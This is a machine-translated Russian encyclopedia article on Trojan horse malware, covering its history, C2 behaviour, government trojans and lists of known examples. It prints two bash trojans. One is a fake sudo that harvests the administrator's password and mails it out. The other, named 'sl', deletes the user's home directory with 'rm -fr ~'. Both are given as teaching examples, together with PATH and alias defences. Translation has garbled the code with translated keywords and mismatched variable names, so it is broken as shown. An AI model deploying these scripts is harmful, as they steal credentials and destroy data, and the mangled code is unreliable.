Троянский конь (компьютеры)
Часть серии о |
Компьютерный взлом |
---|
В вычислительной технике ( троянский конь или просто троян ) — это любое вредоносное ПО , которое вводит пользователей в заблуждение о своих истинных целях, маскируясь под стандартную программу. Этот термин происходит от древнегреческой истории о обманчивом Троянском коне , который привел к падению города Трои . [1]
Трояны обычно распространяются с помощью той или иной формы социальной инженерии . Например, когда пользователя обманом заставляют выполнить вложение к электронному письму , замаскированное под безобидное (например, заполнение стандартной формы), или щелкнув фальшивую рекламу в социальных сетях или где-либо еще. Хотя их полезная нагрузка может быть любой, многие современные формы действуют как бэкдор , связываясь с контроллером, который затем может получить несанкционированный доступ к зараженному компьютеру. [2] Атаки программ-вымогателей часто осуществляются с использованием троянских программ.
В отличие от компьютерных вирусов и червей , трояны обычно не пытаются внедряться в другие файлы или иным образом распространяться. [3]
Использование термина [ править ]
Неясно, где и когда это понятие и этот термин для него были впервые использованы, но к 1971 году первое руководство по Unix предполагало, что читатели знают оба: [4]
Еще одно раннее упоминание содержится в отчете ВВС США за 1974 год об анализе уязвимостей компьютерных систем Multics . [5]
Он стал популярным благодаря Кену Томпсону в его лекции на вручении премии Тьюринга в 1983 году «Размышления о доверии». [6] с подзаголовком: «В какой степени следует доверять утверждению о том, что программа не содержит троянских коней? Возможно, важнее доверять людям, написавшим программу». Он упомянул, что знал о возможном существовании троянов из отчета о безопасности Multics. [7] [8]
Поведение [ править ]
После установки трояны могут выполнять ряд вредоносных действий. Многие из них, как правило, связываются с одним или несколькими серверами управления и контроля (C2) через Интернет и ждут инструкций. Поскольку отдельные трояны обычно используют для этого определенного набора портов, их можно относительно легко обнаружить. Более того, другие вредоносные программы потенциально могут «захватить» трояна, используя его в качестве прокси для вредоносных действий. [9]
В немецкоязычных странах шпионское ПО , используемое или созданное правительством, иногда называют программным обеспечением . Govware обычно представляет собой троянскую программу, используемую для перехвата сообщений с целевого компьютера. В некоторых странах, таких как Швейцария и Германия, существует правовая база, регулирующая использование такого программного обеспечения. [10] [11] Примеры правительственных троянов: Swiss MiniPanzer и MegaPanzer. [12] и немецкий «государственный троян» по прозвищу R2D2 . [10] Немецкое правительственное ПО работает, используя бреши в безопасности, неизвестные широкой публике, и получает доступ к данным смартфонов до того, как они будут зашифрованы с помощью других приложений. [13]
Благодаря популярности ботнетов среди хакеров и доступности рекламных сервисов, позволяющих авторам нарушать конфиденциальность своих пользователей, трояны становятся все более распространенными. Согласно опросу, проведенному BitDefender с января по июнь 2009 года, «растет число вредоносных программ троянского типа, на их долю приходится 83% глобальных вредоносных программ, обнаруженных в мире». Трояны связаны с червями, поскольку они распространяются с помощью червей и путешествуют вместе с ними по Интернету. [14] BitDefender заявил, что около 15% компьютеров являются членами ботнета, обычно привлекаемого троянской инфекцией. [15]
Недавние расследования показали, что метод «троянского коня» использовался для атаки на системы облачных вычислений . Троянская атака на облачные системы пытается внедрить в систему приложение или службу, которая может повлиять на облачные службы, изменив или остановив их функциональные возможности. Когда облачная система определяет атаки как законные, выполняется услуга или приложение, которое может повредить и заразить облачную систему. [16]
Пример sudo для Linux [ править ]
Троянский конь — это программа , которая якобы выполняет какую-то законную функцию, но при выполнении ставит под угрозу безопасность пользователя. [17] Простым примером является следующая вредоносная версия команды sudo в Linux . Злоумышленник поместит этот сценарий в общедоступный для записи каталог (например, /tmp
). Если администратор находится в этом каталоге и выполняет sudo
, то троянец может запуститься, скомпрометировав пароль администратора.
#!/usr/bin/env bash
# Отключить отображение символов на экране. sudo делает это, чтобы пароль пользователя не появлялся на экране при его вводе.
stty -эхо
# Запросить у пользователя пароль, а затем прочитать ввод. Чтобы скрыть природу этой вредоносной версии, сделайте это 3 раза, чтобы имитировать поведение sudo, когда пользователь вводит неверный пароль.
Prompt_count = 1
while [ $prompt_count -le 3 ] ; do
echo -n "[sudo] пароль для $( whoami ) : "
прочитайте ввод_пароля
echo
Sleep 3 # sudo будет делать паузу между повторяющимися запросами
Prompt_count = $(( Prompt_count + 1 ))
Done
# Снова включить эхо символов.
stty echo
echo $password_input | mail -s " $( whoami ) пароль " [email protected]
# Отобразить фактическое сообщение об ошибке sudo, а затем удалить self.
echo "sudo: 3 попытки неправильного ввода пароля"
rm $0
выход 1 # sudo возвращает 1 при неудачной попытке ввода пароля
Чтобы предотвратить sudo
Троянский конь , установи .
запись в PATH
переменная среды, которая должна быть расположена в конце. [18] Например: PATH=/usr/local/bin:/usr/bin:.
.
Пример ls для Linux [ править ]
Имея .
где-то в PATH удобно, но есть подвох. [19] Другой пример — следующая вредоносная версия команды ls в Linux . Однако имя файла не ls
; вместо этого это sl
. Злоумышленник поместит этот сценарий в общедоступный для записи каталог (например, /tmp
).
#!/usr/bin/env bash
# Удалить домашний каталог пользователя, затем удалить self.
rm -fr ~ 2 >/dev/null
РМ $0
Чтобы злонамеренный программист не предвидел эту распространенную ошибку при наборе текста:
- пропускать
.
в PATH или alias sl=ls
[а]
Известные примеры [ править ]
Частные и государственные [ править ]
- АНОМ – ФБР
- 0zapftis / r2d2 StaatsTrojaner – DigiTask
- DarkComet – ЦРУ/АНБ
- FinFisher – ИТ-решения Lench / Gamma International
- DaVinci/Galileo RCS – HackingTeam
- Волшебный фонарь - ФБР
- СОЛНЕЧНЫЕ ВЗРЫВЫ – СВР / Уютный мишка (предположительно)
- ТАО КВАНТУМ/ФОКСАКИД – АНБ
- ВОИННАЯ ГОРДОСТЬ – ЦПС
В открытом доступе [ править ]
- ЭГАБТР - конец 1980-х.
- Netbus – 1998 г. (опубликовано) [20]
- Sub7 от Mobman - 1999 г. (опубликовано)
- Заднее отверстие - 1998 г. (опубликовано)
- Y3K братьев Целентис - 2000 г. (опубликовано)
- Зверь – 2002 (опубликовано)
- Троян Bifrost – 2004 г. (опубликовано)
- ДаркКомет – 2008–2012 (опубликовано)
- Эксплойт-комплект Blackhole – 2012 г. (опубликовано)
- Gh0st RAT – 2009 (опубликовано)
- Федеральный троян MegaPanzer – 2009 г. (опубликовано) [21] [22]
- МЭМЗ Леурака – 2016 (опубликовано)
Обнаружено исследователями безопасности [ править ]
- Двенадцать трюков - 1990
- Clickbot.A – 2006 г. (обнаружен)
- Зевс – 2007 г. (обнаружен)
- Троян Flashback – 2011 г. (обнаружен)
- ZeroAccess – 2011 г. (обнаружен)
- Koobface - 2008 (обнаружен)
- Вундо - 2009 г. (обнаружен)
- Затопление ядра - 2010 г. (обнаружено)
- Троянец Tiny Banker – 2012 г. (обнаружен)
- СОВА – 2022 (обнаружена) [23]
- Вредоносное ПО Shedun для Android – 2015 г. (обнаружено) [24] [25] [26] [27] [28] [29]
Капитализация [ править ]
Компьютерный термин «Троянский конь» происходит от легендарного Троянского коня древнего города Троя . По этой причине слово «Троян» часто пишется с заглавной буквы. Однако, хотя руководства по стилю и словари различаются, многие предлагают использовать «троян» в нижнем регистре для обычного использования. [30] [31]
См. также [ править ]
- Компьютерная безопасность
- Яйцо кукушки (метафора)
- Кибершпионаж
- Танцующие свиньи
- Эксплойт (компьютерная безопасность)
- Промышленный шпионаж
- Фишинг
- Принцип наименьших привилегий
- Программное обеспечение, нарушающее конфиденциальность
- Удаленное администрирование
- Программное обеспечение для удаленного администрирования
- Обратное подключение
- Мошенническое программное обеспечение безопасности
- Мошенники
- Мошенничество с техподдержкой
- Хронология компьютерных вирусов и червей
- Зомби (информатика)
Ссылки [ править ]
- ^ «Определение троянского коня» . Проверено 5 апреля 2012 г.
Греческие солдаты, не сумевшие прорвать оборону города Трои в ходе многолетней войны, преподнесли городу в мирное предложение большого деревянного коня.
- ^ «Разница между вирусами, червями и троянами» . Центр безопасности Симантек . Broadcom Inc. Архивировано из оригинала 19 августа 2013 года . Проверено 29 марта 2020 г.
- ^ «Часто задаваемые вопросы (FAQ) VIRUS-L/comp.virus v2.00 (Вопрос B3: Что такое троянский конь?)» . 9 октября 1995 года. Архивировано из оригинала 5 августа 2020 года . Проверено 16 сентября 2019 г.
- ^ Томпсон, Кен; Ричи, Деннис М. «Руководство программиста Unix, 3 ноября 1971 г.» (PDF) . п. 5 . Проверено 28 марта 2020 г.
Кроме того, нельзя изменить владельца файла с включенным битом set-user-ID, иначе можно создать троянских коней, способных злоупотреблять чужими файлами.
- ^ Каргер, Пенсильвания; Шелл, Р.Р., «Оценка безопасности Multiks: анализ уязвимостей, ESD-TR-74-193» (PDF) , HQ Electronic Systems Division: Hanscom AFB, MA , II , заархивировано из оригинала (PDF) 9 июля 2011 г. , получено 24 декабря 2017 г.
- ^ Кен Томпсон (1984). «Размышления о доверии» . Коммун. АКМ . 27 (8): 761–763. дои : 10.1145/358198.358210 . .
- ^ Пол А. Каргер; Роджер Р. Шелл (2002), «Тридцать лет спустя: уроки оценки безопасности Multics» (PDF) , ACSAC : 119–126
- ^ Каргер и Шелл писали, что Томпсон добавил эту ссылку в более позднюю версию своей конференции Тьюринга: Кен Томпсон (ноябрь 1989 г.), «О доверии», Unix Review , 7 (11): 70–74.
- ^ Крапанцано, Джейми (2003). Деконструкция SubSeven, любимого троянского коня (Отчет). Институт САНС . Проверено 10 мая 2021 г.
- ^ Перейти обратно: а б Бэзил Купа, « Троянский конь воскрес: о законности использования государственного шпионского ПО (Govware)» , LISS 2013, стр. 419–428.
- ^ «Häufig gestellte Fragen (Часто задаваемые вопросы)» . Федеральное министерство юстиции и полиции. Архивировано из оригинала 6 мая 2013 года.
- ^ Данн, Джон (27 августа 2009 г.). «Швейцарский программист рекламирует правительственный шпионский троян» . ТехМир . Архивировано из оригинала 26 января 2014 года . Проверено 10 января 2021 г.
- ^ «Федеральная полиция Германии использует троянский вирус, чтобы обойти шифрование телефона» . ДВ . Проверено 14 апреля 2018 г.
- ^ «Опрос BitDefender по вредоносному ПО и спаму показал, что электронные угрозы адаптируются к тенденциям поведения в Интернете» . БитДефендер . Архивировано из оригинала 8 августа 2009 года . Проверено 27 марта 2020 г.
- ^ Датта, Ганеша (7 августа 2014 г.). «Что такое трояны?» . СекурЭйд . Архивировано из оригинала 12 августа 2014 года . Проверено 27 марта 2020 г.
- ^ Канакер, Хасан; Карим, Надер Абдель; Аввад, Самер AB; Исмаил, Нурул ХА; Зраку, Джамал; Али, Абдулла М.Ф. Аль (20 декабря 2022 г.). «Обнаружение заражения троянскими конями в облачной среде с использованием машинного обучения» . Международный журнал интерактивных мобильных технологий . 16 (24): 81–106. дои : 10.3991/ijim.v16i24.35763 . ISSN 1865-7923 .
- ^ Вуд, Патрик Х.; Кочан, Стивен Г. (1985). Безопасность системы UNIX . Книги Хайдена. п. 42. ИСБН 0-8104-6267-2 .
- ^ Вуд, Патрик Х.; Кочан, Стивен Г. (1985). Безопасность UNIX-системы . Книги Хайдена. п. 43. ИСБН 0-8104-6267-2 .
Вышеупомянутый троянский конь работает только в том случае, если PATH пользователя настроен на поиск команд в текущем каталоге перед поиском в системных каталогах.
- ^ «Что плохого в том, чтобы иметь '.' в вашем $PATH?" . Пенн Инжиниринг . Проверено 28 ноября 2023 г.
[Если] вы неуклюжая машинистка и однажды наберете «sl -l» вместо «ls -l», вы рискуете запустить «./sl», если таковой имеется. Какой-нибудь «умный» программист мог предвидеть распространенные ошибки при наборе текста и оставить программы с такими именами разбросанными по общедоступным каталогам. Остерегаться.
- ^ Сет, Кулаков (1998). «Это все еще троянский конь или действительный инструмент удаленного администрирования?» (Отчет). Институт САНС . Проверено 10 мая 2021 г.
- ^ «Мега-Панцер» . СоурсФордж . 21 сентября 2016 г.
- ^ «Мини-Панцер» . СоурсФордж . 18 сентября 2016 г.
- ^ «Что такое вирус Сова?» . Индия сегодня .
- ^ «Семейство зараженных троянами рекламных программ злоупотребляет службой специальных возможностей, чтобы устанавливать любые приложения, которые им нужны – блог Lookout» .
- ^ Нил, Дэйв (20 ноября 2015 г.). «Рекламное ПО-троян Shedun попадает в службу специальных возможностей Android» . Спрашивающий . Острые деловые СМИ. Архивировано из оригинала 22 ноября 2015 года . Проверено 27 марта 2020 г.
{{cite web}}
: CS1 maint: неподходящий URL ( ссылка ) - ^ «Lookout обнаруживает новое рекламное ПО, зараженное троянами; 20 тысяч популярных приложений попали под перекрестный огонь – блог Lookout» .
- ^ «Вредоносные программы Shuanet, ShiftyBug и Shedun могут автоматически рутировать ваш Android» . 5 ноября 2015 г.
- ^ Times, Tech (9 ноября 2015 г.). «Новое семейство вредоносных программ для Android, которые практически невозможно удалить: передайте привет Shedun, Shuanet и ShiftyBug» .
- ^ «Рекламное ПО для Android может установиться, даже если пользователи явно отвергают его» . 19 ноября 2015 г.
- ^ «троян» . Расширенный словарь Коллинза . Проверено 29 марта 2020 г.
- ^ "троянский конь" . Руководство по стилю Microsoft . Майкрософт . Проверено 29 марта 2020 г.
Примечания [ править ]
- ^ Поместите
alias
заявление в /etc/profile
Внешние ссылки [ править ]
СМИ, связанные с троянским конем (вредоносным ПО), на Викискладе?
- «Рекомендация CERT CA-1999-02 Троянские кони» (PDF) . Институт программной инженерии Университета Карнеги-Меллона . Архивировано из оригинала 17 октября 2000 года . Проверено 15 сентября 2019 г.